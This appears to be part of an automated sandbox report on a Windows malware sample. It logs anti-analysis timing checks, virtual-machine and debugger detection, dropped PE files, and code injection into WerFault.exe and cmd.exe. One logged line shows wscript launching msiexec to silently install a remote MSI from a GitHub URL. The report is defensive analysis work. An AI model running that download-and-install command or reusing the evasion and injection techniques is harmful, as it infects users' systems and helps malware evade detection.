Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: Initial file | Initial file: ' Sleep for a brief period to ensure the install process has been launched WScript.Sleep 3000
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | API/Special instruction interceptor: Address: 6C345B2D
Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 6C343AF9
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | API/Special instruction interceptor: Address: 2ACD7E4
Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | API/Special instruction interceptor: Address: 6AD23799
Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | API/Special instruction interceptor: Address: 29CD7E4
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EA32A0 second address: 62EB3821 instructions: 0x00000000 rdtsc 0x00000002 not al 0x00000004 mov eax, dword ptr [ebp-000000DCh] 0x0000000a push eax 0x0000000b lahf 0x0000000c bswap ax 0x0000000f jmp 00007F772CD0061Bh 0x00000014 mov ecx, dword ptr [ebp-000000E0h] 0x0000001a mov ax, 49EAh 0x0000001e push ecx 0x0000001f mov ah, FFFFFFA5h 0x00000022 movzx dx, al 0x00000026 cbw 0x00000028 push FFFFFFFFh 0x0000002a push FFFFFFFFh 0x0000002c movzx edx, bx 0x0000002f movzx ax, al 0x00000033 push 00000000h 0x00000035 cbw 0x00000037 push 00000005h 0x00000039 cwd 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EB4B3A second address: 62EAE213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 movsx dx, bl 0x00000007 jmp 00007F772CCF95C7h 0x0000000c lea edx, dword ptr [ebp-24h] 0x0000000f mov ch, 00000005h 0x00000012 bswap ecx 0x00000014 cbw 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EAE213 second address: 62EAE21F instructions: 0x00000000 rdtsc 0x00000002 setle ch 0x00000005 push 00000000h 0x00000007 push 590C0DF7h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EB3433 second address: 62EB344A instructions: 0x00000000 rdtsc 0x00000002 cmovns eax, ebp 0x00000005 lea eax, dword ptr [ebp-40h] 0x00000008 push eax 0x00000009 movsx edx, ax 0x0000000c cbw 0x0000000e mov al, 27h 0x00000010 push 00000000h 0x00000012 push A4DA8725h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EA316D second address: 62EB9F3D instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [ebp-27h], FFFFFF88h 0x00000006 mov byte ptr [ebp-26h], 00000050h 0x0000000a movsx ecx, bx 0x0000000d mov byte ptr [ebp-25h], 00000048h 0x00000011 bswap cx 0x00000014 cmovl cx, di 0x00000018 mov byte ptr [ebp-24h], FFFFFF92h 0x0000001c cwde 0x0000001d mov byte ptr [ebp-23h], 00000077h 0x00000021 bswap dx 0x00000024 movzx cx, ah 0x00000028 cwd 0x0000002a mov byte ptr [ebp-22h], 00000011h 0x0000002e jmp 00007F772CD05D88h 0x00000033 mov byte ptr [ebp-21h], FFFFFFB8h 0x00000037 mov byte ptr [ebp-20h], 0000005Bh 0x0000003b xchg ch, dh 0x0000003d mov byte ptr [ebp-1Fh], FFFFFFDBh 0x00000041 not ch 0x00000043 mov byte ptr [ebp-1Eh], FFFFFF8Eh 0x00000047 jmp 00007F772CCDCA0Eh 0x0000004c mov byte ptr [ebp-1Dh], 00000009h 0x00000050 mov byte ptr [ebp-1Ch], 0000005Fh 0x00000054 cdq 0x00000055 movzx edx, sp 0x00000058 jmp 00007F772CD04858h 0x0000005d mov byte ptr [ebp-1Bh], FFFFFFABh 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | RDTSC instruction interceptor: First address: 62EB9F3D second address: 62EA6271 instructions: 0x00000000 rdtsc 0x00000002 mov dx, sp 0x00000005 mov byte ptr [ebp-1Ah], 0000007Ah 0x00000009 movsx eax, di 0x0000000c mov byte ptr [ebp-19h], FFFFFF94h 0x00000010 mov edx, esp 0x00000012 mov byte ptr [ebp-18h], 0000005Ch 0x00000016 cwd 0x00000018 cbw 0x0000001a mov byte ptr [ebp-17h], 0000000Ah 0x0000001e cwde 0x0000001f movsx edx, ax 0x00000022 not ecx 0x00000024 mov byte ptr [ebp-16h], 00000013h 0x00000028 mov byte ptr [ebp-15h], 0000004Ch 0x0000002c jmp 00007F772CCF02F4h 0x00000031 mov byte ptr [ebp-14h], FFFFFFB4h 0x00000035 mov byte ptr [ebp-13h], FFFFFFD6h 0x00000039 mov byte ptr [ebp-12h], 0000004Bh 0x0000003d movzx edx, ax 0x00000040 bswap cx 0x00000043 mov byte ptr [ebp-11h], FFFFFFF7h 0x00000047 seto dl 0x0000004a mov byte ptr [ebp-10h], FFFFFF83h 0x0000004e cwde 0x0000004f cwd 0x00000051 mov byte ptr [ebp-0Fh], 0000006Fh 0x00000055 setnbe dh 0x00000058 mov dh, 00000073h 0x0000005b mov byte ptr [ebp-0Eh], FFFFFFC9h 0x0000005f mov byte ptr [ebp-0Dh], FFFFFFF8h 0x00000063 jmp 00007F772CCFBDB1h 0x00000068 mov byte ptr [ebp-3Ch], 0000001Eh 0x0000006c mov byte ptr [ebp-3Bh], 0000006Dh 0x00000070 lahf 0x00000071 not ah 0x00000073 mov byte ptr [ebp-3Ah], FFFFFF82h 0x00000077 cwde 0x00000078 xchg dh, dh 0x0000007a mov byte ptr [ebp-39h], 00000043h 0x0000007e mov dh, FFFFFFECh 0x00000081 cmovb eax, esi 0x00000084 mov byte ptr [ebp-38h], 00000018h 0x00000088 mov byte ptr [ebp-37h], FFFFFFE7h 0x0000008c cwde 0x0000008d mov byte ptr [ebp-36h], FFFFFFEEh 0x00000091 movzx ecx, si 0x00000094 cdq 0x00000095 mov byte ptr [ebp-35h], 00000042h 0x00000099 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EA6271 second address: 62EA6278 instructions: 0x00000000 rdtsc 0x00000002 lahf 0x00000003 mov byte ptr [ebp-34h], FFFFFFBCh 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB860E second address: 62EB862A instructions: 0x00000000 rdtsc 0x00000002 cbw 0x00000004 lea ecx, dword ptr [ebp-1Ch] 0x00000007 push ecx 0x00000008 movsx eax, ax 0x0000000b mov dh, FFFFFFA5h 0x0000000e cbw 0x00000010 push 00000001h 0x00000012 cbw 0x00000014 cwd 0x00000016 push 00000000h 0x00000018 cmovne dx, ax 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EBC64F second address: 62EBC656 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 mov word ptr [ebp-06h], cx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EAAFE7 second address: 62EAA162 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 lea ecx, dword ptr [ebp-28h] 0x00000006 push ecx 0x00000007 lea edx, dword ptr [ebp-00000158h] 0x0000000d jmp 00007F772CCFF06Dh 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB53BC second address: 62EB5958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772CCF7767h 0x00000007 mov ecx, dword ptr [ebp-24h] 0x0000000a push ecx 0x0000000b push 00000000h 0x0000000d jmp 00007F772CCE8FC8h 0x00000012 push 42E519A4h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EAC1A1 second address: 62EAC1B2 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, bx 0x00000005 push FFFFFFFFh 0x00000007 push 00000000h 0x00000009 push 006FBC1Eh 0x0000000e movzx eax, ax 0x00000011 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EA32A0 second address: 62EB3821 instructions: 0x00000000 rdtsc 0x00000002 not al 0x00000004 mov eax, dword ptr [ebp-000000DCh] 0x0000000a push eax 0x0000000b lahf 0x0000000c bswap ax 0x0000000f jmp 00007F772CD0061Bh 0x00000014 mov ecx, dword ptr [ebp-000000E0h] 0x0000001a mov ax, 49EAh 0x0000001e push ecx 0x0000001f mov ah, FFFFFFA5h 0x00000022 movzx dx, al 0x00000026 cbw 0x00000028 push FFFFFFFFh 0x0000002a push FFFFFFFFh 0x0000002c movzx edx, bx 0x0000002f movzx ax, al 0x00000033 push 00000000h 0x00000035 cbw 0x00000037 push 00000005h 0x00000039 cwd 0x0000003b rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EB4B3A second address: 62EAE213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 movsx dx, bl 0x00000007 jmp 00007F772CCF95C7h 0x0000000c lea edx, dword ptr [ebp-24h] 0x0000000f mov ch, 00000005h 0x00000012 bswap ecx 0x00000014 cbw 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAE213 second address: 62EAE21F instructions: 0x00000000 rdtsc 0x00000002 setle ch 0x00000005 push 00000000h 0x00000007 push 590C0DF7h 0x0000000c rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EBC64F second address: 62EBC656 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 mov word ptr [ebp-06h], cx 0x00000007 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAAFE7 second address: 62EAA162 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 lea ecx, dword ptr [ebp-28h] 0x00000006 push ecx 0x00000007 lea edx, dword ptr [ebp-00000158h] 0x0000000d jmp 00007F772CCEF23Dh 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EB53BC second address: 62EB5958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772CD07597h 0x00000007 mov ecx, dword ptr [ebp-24h] 0x0000000a push ecx 0x0000000b push 00000000h 0x0000000d jmp 00007F772CCF8DF8h 0x00000012 push 42E519A4h 0x00000017 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAC1A1 second address: 62EAC1B2 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, bx 0x00000005 push FFFFFFFFh 0x00000007 push 00000000h 0x00000009 push 006FBC1Eh 0x0000000e movzx eax, ax 0x00000011 rdtsc
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 917Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1523Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1461Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1080Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1363Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1414Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1499Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 663Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C5A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr80.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C7A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C2A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3BAC.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mfc80u.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yljutqdulamJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dsxJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-20100
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-20070
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI coverage: 0.7 %
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI coverage: 8.5 %
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI coverage: 0.7 %
                      Source: C:\Windows\System32\msiexec.exe TID: 6960Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1080 delay: -6Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1363 delay: -5Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1414 delay: -4Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1499 delay: -3Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_00405768
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004026FE FindFirstFileA,7_2_004026FE
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004062A3 FindFirstFileA,FindClose,7_2_004062A3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_6-19969
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401000 GetCommandLineW,GetCommandLineW,wcsstr,wcsstr,GetCommandLineW,wcsstr,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetCommandLineW,wcsstr,FreeLibrary,FreeLibrary
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_204046ED mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20402F80 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20402F80 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_62E86020 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_204046ED mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20402F80 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20402F80 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\msiexec.exe | Process created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00402225 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20478952 _crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_00402225 SetUnhandledExceptionFilter
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 15_2_20478952 _crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Memory allocated: C:\Windows\SysWOW64\WerFault.exe base: 24A0000 protect: page read and write
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Memory allocated: C:\Windows\SysWOW64\WerFault.exe base: 400000 protect: page read and write
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | NtAllocateVirtualMemory: Direct from: 0x62EABF8D
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | NtAllocateVirtualMemory: Direct from: 0x6AD24AC4
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | NtAllocateVirtualMemory: Direct from: 0x62EAD477
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtProtectVirtualMemory: Direct from: 0x4013A8
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtCreateFile: Direct from: 0x62EA6806
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtUnmapViewOfSection: Direct from: 0x62EB40A6
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtUnmapViewOfSection: Direct from: 0x62EA676A
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtQueryInformationProcess: Direct from: 0x62EB5025
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtAllocateVirtualMemory: Direct from: 0x62EBB3D6
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | NtQuerySystemInformation: Direct from: 0x6AD25C3E
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | NtCreateFile: Direct from: 0x6AD23B31
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | NtQueryInformationProcess: Direct from: 0x62EB1047
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtReadVirtualMemory: Direct from: 0x62EA8D6F
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtWriteVirtualMemory: Direct from: 0x62EBBF48
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtProtectVirtualMemory: Direct from: 0x62EB2791
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtReadVirtualMemory: Direct from: 0x62EAA88E
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtAllocateVirtualMemory: Direct from: 0x62EA530E
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | NtQueryInformationToken: Direct from: 0x62EB6504
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | NtProtectVirtualMemory: Direct from: 0x62EAB264
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtAllocateVirtualMemory: Direct from: 0x62EB5A71
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtAllocateVirtualMemory: Direct from: 0x62EB0A1E
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtProtectVirtualMemory: Direct from: 0x62EA3DA1
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtSuspendThread: Direct from: 0x62EA9819
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtAllocateVirtualMemory: Direct from: 0x62EAC69C
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | NtWriteVirtualMemory: Direct from: 0x62EA8A84
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | NtDelayExecution: Direct from: 0x6AD2401D
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 24A0000 value starts with: 4D5A
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 24A0000
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 22C9008
                      Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 6AD21000
                      Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 410000
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 400000
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe | Memory written: C:\Windows\SysWOW64\WerFault.exe base: 266B008
                      Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 6AD21000
                      Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 410000
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Process created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
